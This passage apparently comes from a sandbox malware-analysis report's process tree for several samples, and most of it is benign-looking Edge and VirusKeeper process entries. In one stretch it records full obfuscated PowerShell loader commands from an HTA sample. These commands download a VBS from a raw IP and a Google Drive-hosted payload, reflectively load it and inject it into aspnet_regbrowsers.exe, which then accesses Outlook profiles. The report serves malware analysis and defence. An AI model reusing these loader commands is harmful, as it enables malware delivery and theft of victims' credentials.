        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc157c46f8,0x7ffc157c4708,0x7ffc157c4718
        6⤵
        
        PID:6064
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,3797890283402180663,3998845880764512056,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2160 /prefetch:2
        6⤵
        
        PID:2240
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2144,3797890283402180663,3998845880764512056,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2420 /prefetch:3
        6⤵
        
        PID:5184
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2144,3797890283402180663,3998845880764512056,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3020 /prefetch:8
        6⤵
        
        PID:2500
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,3797890283402180663,3998845880764512056,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3520 /prefetch:1
        6⤵
        
        PID:4960
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,3797890283402180663,3998845880764512056,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3528 /prefetch:1
        6⤵
        
        PID:5108
  - - C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\vk_oascan.exe
      "C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\vk_oascan.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:4956
  - - C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\vk_planrun.exe
      "C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\vk_planrun.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:6408
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.viruskeeper.com/fr/usbsafe2024_promo.htm
      4⤵
      Enumerates system info in registry
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      PID:4576
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc157c46f8,0x7ffc157c4708,0x7ffc157c4718
        5⤵
        
        PID:644
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,18271317719208607032,13829487555292319539,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2156 /prefetch:2
        5⤵
        
        PID:5124
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2128,18271317719208607032,13829487555292319539,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 /prefetch:3
        5⤵
        
        PID:2924
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2128,18271317719208607032,13829487555292319539,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2908 /prefetch:8
        5⤵
        
        PID:5688
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,18271317719208607032,13829487555292319539,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:1
        5⤵
        
        PID:6880
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,18271317719208607032,13829487555292319539,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:1
        5⤵
        
        PID:2428
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,18271317719208607032,13829487555292319539,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3120 /prefetch:1
        5⤵
        
        PID:4244
  - - C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\vk_scan.exe
      "C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\vk_scan.exe" QUICK
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Checks SCSI registry key(s)
      PID:5724
  - - C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\vk_watchop.exe
      "C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\vk_watchop.exe"
      4⤵
      Executes dropped EXE
      PID:3484
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.viruskeeper.com/submit/fr/index.php?id=5414
      4⤵
      Enumerates system info in registry
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      PID:3216
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xfc,0x10c,0x7ffc157c46f8,0x7ffc157c4708,0x7ffc157c4718
        5⤵
        
        PID:5792
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2160,13008723709071764378,18162070967219740286,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2288 /prefetch:2
        5⤵
        
        PID:6608
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2160,13008723709071764378,18162070967219740286,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2708 /prefetch:3
        5⤵
        
        PID:6356
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2160,13008723709071764378,18162070967219740286,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2348 /prefetch:8
        5⤵
        
        PID:5216
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,13008723709071764378,18162070967219740286,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3676 /prefetch:1
        5⤵
        
        PID:2780
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,13008723709071764378,18162070967219740286,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3696 /prefetch:1
        5⤵
        
        PID:1640
    - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2160,13008723709071764378,18162070967219740286,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5076 /prefetch:8
        5⤵
        
        PID:5240
    - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2160,13008723709071764378,18162070967219740286,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5076 /prefetch:8
        5⤵
        
        PID:6260
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2160,13008723709071764378,18162070967219740286,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5096 /prefetch:8
        5⤵
        Modifies registry class
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of SetWindowsHookEx
        
        PID:5728
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,13008723709071764378,18162070967219740286,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5196 /prefetch:1
        5⤵
        
        PID:7100
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,13008723709071764378,18162070967219740286,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5128 /prefetch:1
        5⤵
        
        PID:4952
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,13008723709071764378,18162070967219740286,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2804 /prefetch:1
        5⤵
        
        PID:5584
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,13008723709071764378,18162070967219740286,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3816 /prefetch:1
        5⤵
        
        PID:5244
- C:\Users\Admin\Downloads\samples\32b786ed47a62c8c8f2332299722b31f2149cf370689691268bf88fb1dae35ea\32b786ed47a62c8c8f2332299722b31f2149cf370689691268bf88fb1dae35ea.exe
  "C:\Users\Admin\Downloads\samples\32b786ed47a62c8c8f2332299722b31f2149cf370689691268bf88fb1dae35ea\32b786ed47a62c8c8f2332299722b31f2149cf370689691268bf88fb1dae35ea.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: MapViewOfSection
  PID:7020
- - C:\Windows\SysWOW64\svchost.exe
    "C:\Users\Admin\Downloads\samples\32b786ed47a62c8c8f2332299722b31f2149cf370689691268bf88fb1dae35ea\32b786ed47a62c8c8f2332299722b31f2149cf370689691268bf88fb1dae35ea.exe"
    3⤵
    - Suspicious use of SetThreadContext
    - Suspicious behavior: MapViewOfSection
    PID:3460
- C:\Windows\SysWOW64\mshta.exe
  "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Downloads\samples\706e2d312d3693ccd38e6b489e13e12db863b723865f7f05580bcdc1c779a342\706e2d312d3693ccd38e6b489e13e12db863b723865f7f05580bcdc1c779a342.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
  2⤵
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  PID:2140
- - C:\Windows\SysWOW64\WINdOwSpoweRSheLL\V1.0\PoWERshElL.ExE
    "C:\Windows\SYStEM32\WINdOwSpoweRSheLL\V1.0\PoWERshElL.ExE" "PowErShEll -Ex BYPaSS -NOP -W 1 -C dEVIcEcrEDEnTIAlDePlOYmENt.EXe ; iex($(iEX('[SYsTeM.TeXt.EnCoding]'+[chAr]0X3A+[CHAr]0X3A+'uTf8.geTSTring([SYstem.ConVERT]'+[chAR]58+[CHAR]58+'fRoMBASE64string('+[CHar]0X22+'JGVhNmM4bXJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlckRlZmluSVRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OLmRsTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFBHLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENmbXIsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYVV2eVZCUkQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZmWWxEb2wsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgb0ZYckloKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiU3V4dFBJQkp4bCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRXNQQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbklZcCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkZWE2YzhtclQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDQuMTY4LjcuNTIvMzUvcGljdHVyZXdpdGhhdHRpdHVkZWV2ZW5iZXR0ZXJmb3JhbGx0aGluZ3MudElGIiwiJGVOdjpBUFBEQVRBXHBpY3R1cmV3aXRoYXR0aXR1ZGVldmVuYmV0dGVyZm9yYWxsdGhpbi52YnMiLDAsMCk7U1RBUnQtc2xlZVAoMyk7c3RBUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHBpY3R1cmV3aXRoYXR0aXR1ZGVldmVuYmV0dGVyZm9yYWxsdGhpbi52YnMi'+[cHar]0X22+'))')))"
    3⤵
    - Blocklisted process makes network request
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    PID:6964
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BYPaSS -NOP -W 1 -C dEVIcEcrEDEnTIAlDePlOYmENt.EXe
      4⤵
      Evasion via Device Credential Deployment
      System Location Discovery: System Language Discovery
      PID:1544
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\1bacjcch\1bacjcch.cmdline"
      4⤵
      System Location Discovery: System Language Discovery
      PID:1732
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBD6C.tmp" "c:\Users\Admin\AppData\Local\Temp\1bacjcch\CSCB4BC8825F7CF4025BB9D4BAED3AF3B34.TMP"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:6516
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\picturewithattitudeevenbetterforallthin.vbs"
      4⤵
      Checks computer location settings
      System Location Discovery: System Language Discovery
      PID:2676
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdpWEtpbScrJ2FnJysnZVVybCA9IE5RMGh0dHBzOi8vZHJpdmUuZ29vZ2xlJysnLmNvbS91Yz9leHBvcnQ9ZG93bmxvYWQmaWQ9MVV5SHF3cm5YQ2xLQkozajYzTGwxdDJTdFZnR3hiU3QwIE5RMDtpWEt3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5Jysnc3RlbS5OZXQuVycrJ2ViQ2xpZW50O2lYSycrJ2ltYWdlQnl0ZXMgPSBpWCcrJ0t3ZWJDbGllbnQuRG93bmxvYWREYXRhKGlYS2ltYWdlVXJsKTtpWEtpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW4nKydjb2RpbmddOjonKydVVEY4LkdldFN0cmluZyhpWEtpbWFnZUJ5dGVzKTtpWEtzdGFydEZsYWcgPSBOUTA8PEJBU0U2NF9TVEFSVD4+TlEwO2lYS2VuZEZsYWcgPSBOUTA8PEJBU0U2NF9FTkQ+Pk5RMDtpWEtzdGFydEluZGV4ID0gaVhLaW1hZ2VUZXh0LkluZGV4T2YoaVhLc3RhcnRGbGFnKTtpWEtlbmRJbmRleCA9IGlYS2ltYWdlVGV4dC5JbmRleE9mKGlYS2VuZEZsYWcpO2lYS3N0YXJ0SW5kZXggLWdlIDAgLWFuZCBpWEtlbmQnKydJbmRleCAtZ3QgaVhLc3RhcnRJbmRleDtpWEtzdGFydEluZGV4ICs9IGlYS3N0YXJ0RmxhZycrJy5MZW5ndGg7aVhLYmFzZTY0TGVuZ3RoID0gaVhLZW5kSW5kZXgnKycgLSBpWEtzdGFydEluJysnZGV4O2lYS2Jhc2U2NENvbW1hbmQgPSBpWEtpbWFnZVRleHQuU3Vic3RyaW4nKydnKGlYS3N0JysnYXJ0SW5kZXgsJysnIGlYS2Jhc2U2NExlbmd0aCk7aVhLYmFzZTY0UmV2ZXJzZWQgPSAtam8nKydpbiAoaVhLYmEnKydzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIDJDUSBGb3JFYWNoLU9iamVjdCB7IGlYS18gfSlbLTEuLi0oaVhLYmFzZTY0Q28nKydtbWFuZC5MZW5ndGgpXTtpWEtjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvJysnbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKGlYS2Jhc2U2NFJldmVyc2VkKTtpWEtsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoaVhLY29tbWFuZEJ5dGVzKTtpWEt2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKE5RMFZBSU5RMCk7aVhLdmFpTWV0aG9kLkknKydudm9rZShpWEtudWxsLCBAKE5RMHR4dC5VTExQTVMvNTMvMjUuNy44NjEuNDAxLy86cHR0aE5RMCwgTlEwZGVzYXRpdmFkb05RMCwgTlEwZGVzYXRpdmFkbycrJ05RMCwgTlEwZGVzYXRpdmFkb05RMCwgTlEwYXNwbmV0X3JlZ2Jyb3dzZXJzTlEwLCBOUTBkZXNhdGl2YWRvTlEwLCBOUScrJzBkZXNhdGl2YWRvTlEwLE5RMGRlc2F0aXZhZG9OUTAsTlEwZGVzYXRpdmFkb05RMCxOUTBkZXNhdGl2YScrJ2RvTlEwLE5RMGRlc2F0aXZhZG9OUTAsTlEwZGVzYXQnKydpdmFkb05RMCxOUTAxTlEwLE5RMGRlc2F0aXZhZG9OUTApKTsnKS5SRVBsYWNlKCcyQ1EnLCd8JykuUkVQbGFjZSgnaVhLJyxbc1RyaU5nXVtjaGFyXTM2KS5SRVBsYWNlKChbY2hhcl03OCtbY2hhcl04MStbY2hhcl00OCksW3NUcmlOZ11bY2hhcl0zOSkgfCAuICggJHNoRWxMSURbMV0rJHNIZUxsaURbMTNdKydYJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3924
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('iXKim'+'ag'+'eUrl = NQ0https://drive.google'+'.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0 NQ0;iXKwebClient = New-Object Sy'+'stem.Net.W'+'ebClient;iXK'+'imageBytes = iX'+'KwebClient.DownloadData(iXKimageUrl);iXKimageText = [System.Text.En'+'coding]::'+'UTF8.GetString(iXKimageBytes);iXKstartFlag = NQ0<<BASE64_START>>NQ0;iXKendFlag = NQ0<<BASE64_END>>NQ0;iXKstartIndex = iXKimageText.IndexOf(iXKstartFlag);iXKendIndex = iXKimageText.IndexOf(iXKendFlag);iXKstartIndex -ge 0 -and iXKend'+'Index -gt iXKstartIndex;iXKstartIndex += iXKstartFlag'+'.Length;iXKbase64Length = iXKendIndex'+' - iXKstartIn'+'dex;iXKbase64Command = iXKimageText.Substrin'+'g(iXKst'+'artIndex,'+' iXKbase64Length);iXKbase64Reversed = -jo'+'in (iXKba'+'se64Command.ToCharArray() 2CQ ForEach-Object { iXK_ })[-1..-(iXKbase64Co'+'mmand.Length)];iXKcommandBytes = [System.Co'+'nvert]::FromBase64String(iXKbase64Reversed);iXKloadedAssembly = [System.Reflection.Assembly]::Load(iXKcommandBytes);iXKvaiMethod = [dnlib.IO.Home].GetMethod(NQ0VAINQ0);iXKvaiMethod.I'+'nvoke(iXKnull, @(NQ0txt.ULLPMS/53/25.7.861.401//:ptthNQ0, NQ0desativadoNQ0, NQ0desativado'+'NQ0, NQ0desativadoNQ0, NQ0aspnet_regbrowsersNQ0, NQ0desativadoNQ0, NQ'+'0desativadoNQ0,NQ0desativadoNQ0,NQ0desativadoNQ0,NQ0desativa'+'doNQ0,NQ0desativadoNQ0,NQ0desat'+'ivadoNQ0,NQ01NQ0,NQ0desativadoNQ0));').REPlace('2CQ','|').REPlace('iXK',[sTriNg][char]36).REPlace(([char]78+[char]81+[char]48),[sTriNg][char]39) | . ( $shElLID[1]+$sHeLliD[13]+'X')"
        6⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        
        PID:1076
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
        7⤵
        
        PID:5128
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
        7⤵
        Accesses Microsoft Outlook profiles
        outlook_office_path
        outlook_win_path
        
        PID:5740
- C:\Users\Admin\Downloads\samples\869acdb8281279b9c58cf1c0bc8fc4a3b13d26c81bfa7e8970ea1991f77d32b3\869acdb8281279b9c58cf1c0bc8fc4a3b13d26c81bfa7e8970ea1991f77d32b3.exe
  "C:\Users\Admin\Downloads\samples\869acdb8281279b9c58cf1c0bc8fc4a3b13d26c81bfa7e8970ea1991f77d32b3\869acdb8281279b9c58cf1c0bc8fc4a3b13d26c81bfa7e8970ea1991f77d32b3.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:3476
- C:\Users\Admin\Downloads\samples\2387dfcd993c8035b2f72ad89935d4521b294010115384aaa9cf93813f7ae4ce\2387dfcd993c8035b2f72ad89935d4521b294010115384aaa9cf93813f7ae4ce.exe
  "C:\Users\Admin\Downloads\samples\2387dfcd993c8035b2f72ad89935d4521b294010115384aaa9cf93813f7ae4ce\2387dfcd993c8035b2f72ad89935d4521b294010115384aaa9cf93813f7ae4ce.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Drops startup file
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  PID:5444
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
  2⤵
  - Accesses Microsoft Outlook profiles
  - System Location Discovery: System Language Discovery
  PID:6584
